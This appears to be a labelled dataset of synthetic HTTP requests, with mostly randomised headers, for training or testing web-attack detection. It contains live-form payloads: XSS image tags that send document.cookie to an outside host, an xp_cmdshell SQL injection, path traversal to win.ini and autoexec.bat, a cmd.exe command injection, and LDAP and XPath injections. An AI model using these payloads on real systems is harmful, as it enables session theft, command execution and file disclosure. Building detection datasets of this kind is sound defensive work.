Referer: http://www.ean9aui.cz/ulie/hpyHvp.js
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 6.7; eo-8f; rv:4.5.4) Gecko/16959390
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 877x4813
Via: 5.8 www.aavas.jpg:31
Transfer-Encoding: identity
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40944
Start - Id: 46821
class: XSS
PUT /mocha3zVTBi5/dpesigotTrntenrm/script-xp_tqTWEal/6buTlee5si2issmim/cdfsleCu1rhMicwzhn/3hMJVoTuM61tSRXsyn/eoynttiMHeid/teWO..asmx? HTTP/1.0
Content-Length: 351
Content-Language: h,whhSls
Content-Encoding: deflate
Content-Location: /s5d9ey/sned7.pdf
Content-MD5: cDd0bWlwNWdzYXBnZ2VuOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Apr 09 15:36:40 UTC
Last-Modified: Sat, 15 Dec 07 21:22:41 UTC
Host: www.qpmr.uk:1207
Connection: keep-alive
Accept: image/*, application/rtf;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: nehleyy-s;q=0.0, sont2en-s, St6scaDr-tkfc;q=0.6
Cache-Control: min-fresh=2021
Client-ip: 24.39.240.157
Cookie: rnzePirzspe2o=49;nlao524erisuee=p;xrreox=rinyn;6icuetatch=nbleSdt]e gt
Cookie2: $Version="9"
Date: Fri, 16 May 08 05:43:07 CET
ETag: W/"CE44HJExLHf9qTC"
Expect: 100-continue
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sun, 04 Jan 09 23:33:17 GMT
If-Unmodified-Since: Thu, 25 Sep 08 15:20:57 CET
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: *
Max-Forwards: 60
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 0-
Referer: /xE1o3ea/rDee/v3aiRl/risI/e5dbhe.sh
TE: trailers,gzip;q=0.3,trailers
Trailer: If-None-Match
User-Agent: rrdmaurool (p4hqnmI8; tW0AE3Hrl; nZs5V6F1)
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 www.Eo9Gdenl.shtml, HTTP/7.0 128.126.207.82, eibms/8.9 143.36.8.148
Transfer-Encoding: heahN3; boqnoS=ltnft
Upgrade: deT/2.6, f3mc4/0.2, zl2o/8.1, sg21/0.7
Warning: 012 66.34.17.105 "buyInnrnE" 
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ynW3x=2953964889&ieetosnt=eeraNmtsx5x&ssotsre=360424&p9uhiUdmun6g=706306&cRz_=<img   src=   "    javascript:    [document.location.replace   ('http://www.chitar.com/cgi-bin/rorime.cgi'+document.cookie);]    "    >&snuhni=leeyr&cadnReet=0550507&RtmsssaUdpasxqE=eaguoq)gatl= &pe1parac=2&tmaeo=295&eaidy8ux=10745

End - Id: 46821
Start - Id: 41825
class: SqlInjection
GET /bP43AtjwS/svg9l7/l6l3/rnlOrchiDeethr/ecPR4_4b/cdocumentvL/cFhierc/9ehspeTsrdhusofrstit/LPNVlocationpF0s/d4otBmenew7kakEncFi/oOyx7p/X95mailLwRB.jpg?s9Toehkbzgzfihn=%27+AND+USER_NAME%28%29%3D%27ebgrt&aoewcihe2is0=0ic&4Ebnoo87wcx=elssDb9ohmmOb&eoyedn4ans=rstylet&ktOyobubihn=027&i4r36ltuu=v1uEnnU%27&nt4=x5tJN4-tqAy HTTP/1.0
Host: 248.98.50.192
Connection: keep-alive
Accept: application/rtf;q=0.0, application/zip, video/*;q=0.2
Accept-Charset: iso-8859-7, windows-1251, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.70.15.74
Cookie: npdn=rlbn;htosr2niP=073824882;poeza=> ib;Fb=8;YCfromwDzOS8nw=Se
Cookie2: $Version="5"
Date: Sat, 23 Apr 05 09:55:07 CET
ETag: W/"Tc@F6JEKUDHdlFzOY"
Expect: jao4e=iser
From: onirdzsS@rcotthemoE.gov
If-Modified-Since: Thu, 06 May 04 09:42:23 GMT
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "Z950G3Wh9L7iZ-qA"
If-None-Match: "cCddMlT9Dyf7Y4L"
If-Range: Sat, 10 Mar 07 15:52:45 CET
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic aGUzczpsZXRh
Range: 1-,-175130,8812-321864
Referer: /adWom8h.swf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 1.3; lo-de; rv:8.9.4) Gecko/56735377
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: identity
Upgrade: howg0r/2.1, n5ai7/3.4, 4bnu/8.0, 5mO/2.4
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41825
Start - Id: 36212
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.ehl8tog9eb.de:48
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 57.19.106.255
Cookie: 8t3=liuatRehoc6eN;HKQYVbinb-kAP=3305;mn5via=1;DFQPV=knoderughhCsaaajl;oTcr=6081375
Cookie2: $Version="32"
Date: Sun, 24 May 09 19:47:41 CET
ETag: "GO2S.faufqbFl7gf_ODS"
Expect: e86z=ehdsOdp;uenhi1
From: aesn@tdnix0ah2.ch
If-Modified-Since: Sun, 20 Jun 04 18:13:48 CET
If-Match: *
If-None-Match: *
If-Range: "kg4aiHskEb@3r3EtOx"
Max-Forwards: 183
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZGhvbjpuZHRmcno=
Range: 183-
Referer: /Lrs6D0y/giem/iene/0edTi5ib.tiff
TE: trailers
Trailer: Accept-Language
User-Agent: eeb8Ism (sGLd2_JtN)
UA-Disp: 399,5892,8
UA-OS: Win98
Via: 7.0 124.150.160.142, FTP/1.0 162.249.68.178, 1.0 22.82.91.231:088
Upgrade: sst2oo/6.7, eatt/1.0
X-Serial-Number: 003494109

null

End - Id: 36212
Start - Id: 45677
class: PathTransversal
GET /UBUO.YLoo/jY00_Ky0QXq8@c/rAnI9H2mBRpGY3b-/eL.hnwDuUB/kVEMm4j/tvpnc8UrqqbVe/n0trretstt/rna36dVedE/euFuvgRY1cr-X/hTL/pyiimdtorbJyeoH/iDcIss.cgi?V9VUaKgsAn=ddG&2CaMeecaacta=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&aTeieeeegrit=29970858&An3mseSrusnpPK=qu59h&t4=146028&VntvFCvbscriptS-4=nm5a&4Y.vu=963155&2YXb__kA=83527 HTTP/1.0
Host: 109.149.107.102:4267
Connection: sEnhz
Accept: video/*;q=0.4, image/png, audio/*
Accept-Charset: iso-8859-5;q=0.7, utf-8;q=0.1, iso-8859-5;q=0.1, euc-cn, euc-kr;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=3
Client-ip: 10.24.0.201
Cookie: of=49
Cookie2: $Version="61"
Date: Fri, 11 Apr 08 23:32:30 GMT
ETag: "d3OxHUukZzKDM.slNqr5"
Expect: slmtuts
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Sat, 09 Dec 06 22:30:29 UTC
If-Unmodified-Since: Sat, 03 Sep 05 24:00:47 GMT
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Mon, 23 Apr 07 11:48:01 CET
Max-Forwards: 1
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: oGoyof nlnLtu=rt4dacRc
Range: -368400,7896-37283
Referer: http://otds9r.org/zsixs5/ebhiaih1.sh
TE: trailers,trailers
Trailer: User-Agent
User-Agent: oTt6Zl http://www.kheI.de
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/9.3 191.143.86.223:8, 8rbA/0.3 www.kiuc.gif
Transfer-Encoding: deflate
Upgrade: smhza/6.1, omsu/2.6, 8ysein/9.3
Warning: 534 45.179.228.107 "hsatu" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45677
Start - Id: 36085
class: PathTransversal
GET /esgtkngydnfrreise.asmx?zDlikeBUU4Z=299774585&arlasnesla4rbr=k%3A%5Cautoexec.bat&J1wJ=thA9yssTntY8fig HTTP/1.1
Host: www.21Et.de
Connection: keep-alive
Accept: application/zip;q=0.0, video/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: aRd-io, neaoQoi1-x
Cache-Control: jx8=heyQ6w
Client-ip: 239.15.78.97
Cookie: pmcl=ita36ens0aij:d ;eEpnR7sRe3tteoz=hvbscriptnuuds;lgiwSoHbnnl=sEZbWXMCu44X;WAboteweMgi=crtld
Cookie2: $Version="98"
Date: Sat, 03 Nov 07 09:40:21 UTC
ETag: "7fLBlcqP1.G7Uml"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "6vpxi.BvQK2I1u47-at"
If-None-Match: *
If-Range: Wed, 30 Sep 09 18:46:51 UTC
Max-Forwards: 604
MIME-Version: 8.7
Pragma: toqKelp='t'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM dFNsaGdwcnNzbUVlcnR5ZWVpbGFtbzdyZXRpZW96bHBub2l6c25n
Range: 580617-399630,-49399
Referer: /eoys4e/si7tanoa.tar.gz
TE: trailers,deflate;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 2.8; sc-im; rv:9.6.5) Gecko/50510058
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 039x0543
Via: 2.7 101.14.29.209:9
Transfer-Encoding: gzip
Upgrade: dnent/3.0, auXt/9.5
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 0275337100162
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36085
Start - Id: 35046
class: SqlInjection
GET /allnrixetwsaeenisbey/etulurs/2wch4iogeateinmiot/y0/oacsrbatHfarudm/r1eedae5eaOodEoe49n/otPE/ohV5om/stdeietdst/enads3HmstSet8ta/hpw/ipeee6eeaeah.jpeg?-_8H14c=446024&SeoidnNNleuje=b-_rSfR&etoteu=4+o+gLtp%3Cstdin&tn=achsha&Ev-VbinN_stdinrESa=149292418&aiCe=sV26ycIpVn&hOCCo.2dz=exec++xp_cmdshell+%27%22tn%22+++++%3E%3E+script.vbs%27&udssstZg9a=s1an&gi8c7thyrn=uirgS HTTP/1.0
Host: 213.241.142.180
Connection: rtty
Accept: */*;q=0.6
Accept-Charset: windows-1257;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: H-acviutr, qr-d8s;q=0.5, s-u0rs2n;q=0.8
Cache-Control: min-fresh=29630
Client-ip: 175.67.198.190
Cookie: aepmttfdt=19;eiclnvsfwre2rdu=ya3E9S=Nhdl2H;a0riDa=ulsw0a3ci2tstNj;LjKI6GE=he'EnWnmsom s;dfnoIOceat8Ahe=793
Cookie2: $Version="16"
Date: Thu, 10 May 07 24:55:58 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Sun, 21 Nov 04 19:04:21 UTC
If-Unmodified-Since: Sun, 09 Jul 06 21:21:06 CET
If-Match: "@E7Ef4CY-tUdMPWb1R5"
If-None-Match: "GKtrY63.V_2TGqIQgc5"
If-Range: "sJgoAZjc8z8NEx880"
Max-Forwards: 7
MIME-Version: 0.3
Pragma: th=lhhn
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: nMsev rhec=oooQeenc
Range: -373777
Referer: /brsi3sm.txt
TE: trailers
User-Agent: Mozilla/6.3 (compatible; Konqueror/7.9; Windows NT; Ixsc; iuaeseTId)
UA-CPU: StrongARM
UA-Color: color32
Via: rtsat/8.5 244.182.146.235:6, mte/8.9 www.u1Eqhie8.png
Transfer-Encoding: gzip
Upgrade: ntza0i/5.5
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35046
Start - Id: 44035
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 126.73.198.243
Connection: imychc
Accept: application/*, video/*;q=0.2, image/png;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: emfc-R;q=0.3, Fr-g;q=0.0, 1Tbtct-feO, e-Cahaavdb;q=0.5
Cache-Control: min-fresh=1
Client-ip: 78.141.142.69
Cookie: 2mvr5oi=iRHnfnec50;sjQerlrnv=oMe
Cookie2: $Version="0"
Date: Mon, 24 May 04 19:37:25 UTC
ETag: "WbM8En5tZV7LU.d"
Expect: e3et=angools;afxg=l15eYh
From: fasutm@u0PGri.cz
If-Modified-Since: Tue, 12 Feb 08 10:52:51 UTC
If-Unmodified-Since: Sat, 11 Apr 09 15:14:41 UTC
If-Match: "PZ6__oUsmE0h6nd4D"
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
Max-Forwards: 15
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: Digest realm
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: http://oCtn.st/oepobni/oseh3/ehitmc.js
TE: gzip,trailers,deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 3.9; gx-gl; rv:1.2.3) Gecko/82747259
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/6.9 14.89.228.227:412, hta/0.0 www.sere.shtml:0694
Transfer-Encoding: nraOo
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44035
Start - Id: 47221
class: XSS
GET /a8ktstntEnas/npHEG41Z-p9hQxp/ehBXDRPiD7/nih/dhtoxx82lzaaard/ivt1aeBmpw8snr/anS/pnece2uertm/s84eboatrkNsceahsu.exe?eg6b=352&ktao7rR=kS0csunleogeene&uppwyt0deaaeius=l%25b&WMacceptws0cmW9r=%3Cimg+++src++%3D%22++++mocha%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ge.com%2Fcgi-bin%2Fntelch.cgi%27%2Bdocument.cookie%29%3B%5D%22+++%3E&obnelwe=f8v7upZS&Sbwirgs32o9hdi=%2Fxterm%7Exc HTTP/1.0
Host: www.Aa6s.gov
Connection: keep-alive
Accept: application/*;q=0.2, application/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: si-aslse, oheqiive-t87eue;q=0.4
Cache-Control: max-age=64203
Client-ip: 208.160.246.210
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Wed, 16 Dec 09 19:49:04 CET
ETag: "sffq97EglwyE3Ups"
Expect: 100-continue
From: ti73@utlaaob.ch
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Wed, 17 Mar 10 13:21:38 GMT
If-Match: *
If-None-Match: "-D550.D.41M_iKp_LQAq"
If-Range: "ej1u75kNnOtKjbGRB1C"
Max-Forwards: 161
MIME-Version: 6.5
Pragma: iep=t5etsO
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Basic Y2hyTWlyczE6a2lyc3Q=
Range: 4321-2
Referer: /ciqvt/rnuy.ace
TE: gzip;q=0.1,trailers,gzip;q=0.4
Trailer: Referer
User-Agent: Mozilla/8.6 (Windows; U; Win98 4.2; ns-oj; rv:9.7.3) Gecko/66121027
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 286x017
Via: FTP/5.8 243.168.202.251, 1.0 www.6vs9Z8if.jpeg:949
Transfer-Encoding: tEne
Upgrade: rako/1.9, sgo/1.5, 5edi/5.4, t0a/2.0
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 102.233.207.222
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47221
Start - Id: 38481
class: LdapInjection
GET /py4Ix/gurimmoporeebsnr/ngr9F9DNN-.swf?Hephanm=liservicesnxp_hhDnhorl%3Cni%3D&tvLaiqbeheseOs=%29++%28%7C++++%28ob%3Delidm*%29&OI6yRc72eeet=u&afsec5c1ca=ozAuO3&xmluftpk.uMUbCcmd=nosz+7stdinp+nw7hs&uoidhmyriteOnB=spsCahrpydvseln&3sNm=7&tkpeee7aL9ns=j%25i&etN7li=se%28trwsana&idoRjHheencfmt=618561&tomi=gr- HTTP/1.0
Host: www.iAouba.fr
Connection: 0Rwi
Accept: text/xml;q=0.8, image/gif;q=0.1, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=3306
Client-ip: 50.101.101.125
Cookie: edmismI=jeledtimASnjti8m;6Scp5ahtmeenb=tnAratrti|f4ozdelete;hdmsomrbrbtiee=shiyiM=select(Coo-t=46a;eseLr9toteuado=42128326
Cookie2: $Version="51"
Date: Fri, 27 Apr 07 03:45:10 UTC
ETag: W/"HdLDJ1hGjmZABeS"
Expect: stre=tmrfue
From: b8antatt@o1neid.cz
If-Modified-Since: Mon, 09 Nov 09 24:09:15 GMT
If-Unmodified-Since: Sun, 01 Aug 04 16:57:57 CET
If-Match: *
If-None-Match: *
If-Range: "gHtCQ_GNSjsam_ynpF"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: NTLM NHJtbktVblI4QXJ3Mm1ubGdzaXI5aW9kZmVPd2JwbGdmZWR0czc=
Range: 58935-,-048057,4298-
Referer: http://t3iahiX.st/TwtHt/f7et1c/reako/7si5m.mdb
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: Mozilla/9.0 (compatible; uaR3uhl7f; Open BSD i386; nqosrr; zv6t4iNcj)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: 1.7 www.ilemwtvh.tiff, HTTP/5.1 131.93.125.246
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38481
Start - Id: 49936
class: XPathInjection
GET /b7ndd.css?p8yeautrfsnte=0993&htrcfeooqe=46209&9tol6d=hftp%2BnRod%3ET%24o+&rkihrnfSY=0-KwDQTjwMdb&9rnewfidDs=6&wgetgbinP5yU_access_logKbO=9368209&ullcror=lgroup+byANst+%3Dyzd3&lknsSniidrjio=crrhnvwIhmt7ruw&e7eknmAcaB7=cgLuzdJtv&eiseNge=menfc3hv&5ri=itEiuSa%27++or+++++1%3C+++++ce%2Ftni1%2F9rmr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D976%5D++++or+++%27oe5hJzS%27+++%3D%27&qenmm=oRt1K4SAr8&4oa4o=osBbwpolRe HTTP/1.1
Host: 236.130.24.201
Connection: close
Accept: application/zip;q=0.6, image/jpeg;q=0.2, video/mpeg;q=0.6
Accept-Charset: windows-1251;q=0.6
Accept-Encoding: compress, gzip, gzip;q=0.0, identity
Accept-Language: mhhea-ismiun, EiniR-l;q=0.2, acg-iktzz;q=0.2
Cache-Control: max-stale=40505
Client-ip: 69.149.110.120
Cookie: Zv3u=cVv6Cq_C9NJ2;ndseloehnNPs=Ltnjo7nr( 
Cookie2: $Version="5"
Date: Wed, 22 Sep 04 20:14:35 GMT
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Thu, 25 Jan 07 13:48:17 GMT
If-Unmodified-Since: Thu, 19 Apr 07 19:43:28 CET
If-Match: *
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: Fri, 27 Jun 08 09:01:00 CET
Max-Forwards: 428
MIME-Version: 7.1
Pragma: hcho=wlaaNEra
Proxy-Authorization: Digest nonce
Authorization: NTLM bmhlc3JhZmx0ZHFibzVlY2FvZm1qczNUZW5hbGFObXdzbg==
Range: -821,817-,-8
Referer: http://ed9ui.biz/Hthaex/iten/eter.pl
TE: trailers,trailers
Trailer: Via
User-Agent: 7egtEuesoJbo6attSe
UA-CPU: x86
UA-Disp: 4764,9289,32
UA-OS: Windows 95
UA-Pixels: 299x2707
Via: bhDdns/7.0 126.156.193.138, 0.0 28.79.191.126, HTTP/7.5 102.34.12.92:39299
Transfer-Encoding: gzip
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49936
Start - Id: 37607
class: LdapInjection
POST /ereizoy1Rme/nsteE4ostEuansEc/ikzcUw/u8wbWx/f_8gM.7yEiPsdLvZR/tE7of4/pFr0ex7RI6Zo15fi/nx.lV.css? HTTP/1.0
Content-Length: 334
Content-Language: nZrnSaUa,om
Content-Encoding: deflate
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: cFNsbDZob2V0bmx1a3RvRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jun 06 11:25:41 GMT
Last-Modified: Wed, 08 Mar 06 06:21:26 GMT
Host: 43.126.250.106
Connection: close
Accept: application/postscript, application/rtf
Accept-Charset: euc-cn;q=0.8
Accept-Encoding: *
Accept-Language: mtue-ysE
Cache-Control: min-fresh=258
Client-ip: 45.20.148.187
Cookie: ze9BlocationZ=732496;9etha9stahwo9=eandhpg;.ByWM_eEdelete=Sde;iamJsi8ePtC7N=libde]ei ohssg/p\e
Cookie2: $Version="1"
Date: Mon, 22 Oct 07 07:30:28 CET
ETag: "@QX@_ywUL101QKMd"
Expect: atOn8lmw=quhao
From: shqwscZ@htnl9xec.gov
If-Modified-Since: Tue, 28 Dec 04 13:04:04 UTC
If-Unmodified-Since: Sat, 17 Jun 06 06:52:12 CET
If-Match: *
If-None-Match: *
If-Range: "bKzjmmSku3m81rjF"
Max-Forwards: 5
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM U2lidUV0ZW52c2tlc2hpcGlwZG5uYW51OXNvbE9sdWNlaTFkenNoZDhqdGVpSQ==
Range: 5-,297-087
Referer: http://www.5aun.uk/oh1snk5n/oTnnai/w0n07k/sne4.mpeg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.9 (X11; U; Unix 5.8; c3-os; rv:2.6.3) Gecko/72215576
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: deflate
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 884 75.45.43.166 "cemm8l" "Sun, 10 Jul 05 20:22:37 CET"
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ncdieeeteemmaie=ow&rmi9g3ahfneteti=hinsertQ|rI&Tynars=i5jM8&ma=5rh&5@alls=3491826&onaziee=el9Hi7&eohgdwF=epZU5x@_&GQlHi5Rhee=875)(&(objectClass=liee)(|(sn  =   ummc)(cn=dte  J*))&aU9LDNQIw.=g0U&Aro9nukA=9tvaryli+samuevalesh&v3n=ypassthrui&iAuetue=8713189&svsipkrlcsohi=3&yz=E'&Euxhzt5ecudRn=eoxp_

End - Id: 37607
Start - Id: 44669
class: PathTransversal
GET /rXZNV1XZGXkGN--Ajg/akdeonaln3at/lcmlkjAnoS/tpmthrawetavi/te/nsertda.htm?sW4endveaCe=rWaRuN6hm6r.&CWfJ8k@GIs=hp7dor3u&ekrkel=m8VoWqwj&emspgt4nea=n&efqiiqaznE=8VGq&tk07coj1ee=hteefrom%3DI&aystgemdnu=h HTTP/1.1
Host: www.id7ciTCg.be
Connection: rwoeleo5
Accept: */*
Accept-Charset: iso-8859-2;q=0.4, x-mac-korean;q=0.1, windows-1257;q=0.9, iso-8859-4;q=0.7, x-mac-cyrillic;q=0.4
Accept-Encoding: 
Accept-Language: z8ii-avRsa
Cache-Control: no-store
Client-ip: 47.118.94.95
Cookie: tuaTrT2lnu=iall>0dn7betweenmniu stn;0MpiBraV=rtikereehkgEfayodl;tstdYliofykjfm=collection(  file:///c:/lo/Mech.xml   );odX=ealt2iiOtaixloba;qeWbSGC.=optioqgi=0ewp-<e<h8n'al
Cookie2: $Version="8"
Date: Wed, 19 Mar 08 06:43:13 GMT
ETag: W/"ZPtdydKjD0o8GzDZSp"
From: esO7ean@to9rgrv.org
If-Modified-Since: Fri, 15 Aug 08 09:36:50 UTC
If-Unmodified-Since: Fri, 03 Jul 09 05:07:04 UTC
If-Match: *
If-None-Match: "M7BsGokVxIjDY4Y5yn7"
If-Range: Sun, 14 Jan 07 21:29:09 GMT
Max-Forwards: 57
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: etOx mtcLY=aeczc
Authorization: Digest algorithm=MD5-sess
Range: 267-5496
Referer: /fHcdnt/w3wtooj/zZafoMi.mdb
TE: chunked,trailers
User-Agent: Mozilla/3.1 (X11; U; Solaris 0.0; i5-se; rv:7.2.4) Gecko/29276971
UA-Disp: 2213,7553,16
UA-OS: WinNT
UA-Pixels: 0638x7767
Via: 4.4 144.248.42.63, FTP/7.0 www.8ywy9h.js
Transfer-Encoding: compress
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 72425044847598734540

null

End - Id: 44669
Start - Id: 49759
class: XPathInjection
GET /eeasnpir7fF/1e6gj/loodccahtoRvtf.html?pvihsnz=i0OfQOOsb6darcsE&@mZO60e=71409067&3RmesmShro=%28i+++%3C+++count%28o1xtTh%2Fchild%3A%3Atext%28%29%29+++and++j++%3C++++count%28a0o%2Fchild%3A%3Acomment%28%29%29++and+++++k+++++%3C++++count%28tDemh%2Fchild%3A%3A*%29++++%29 HTTP/1.0
Host: www.eaao.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=41075
Client-ip: 149.198.73.153
Cookie: trsHld5ctCion=nodeiE\;mk=i2vintloNhrsr;du=6
Cookie2: $Version="367"
Date: Thu, 07 Jan 10 05:36:06 GMT
ETag: W/"C6vM2QmYRX16nGaa"
Expect: 6itn=bdoaua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Thu, 27 Aug 09 04:40:27 CET
If-Unmodified-Since: Sun, 17 Jul 05 10:57:07 UTC
If-Match: *
If-None-Match: "7Qvs6032q6ggX3.@N"
If-Range: Sun, 28 Nov 04 11:48:48 GMT
Max-Forwards: 8888
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic Y243d3NtOmhxaWVpcmxp
Range: 186464-,-8
Referer: /boexatGe/thee6om/iaTecea/mria/aedftea.ace
TE: deflate
Trailer: Cache-Control
User-Agent: ioAnrrurcnee
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3095x7377
Via: tfyr/4.6 www.jCtaf.js, 0.4 www.zdjlrdQm.png
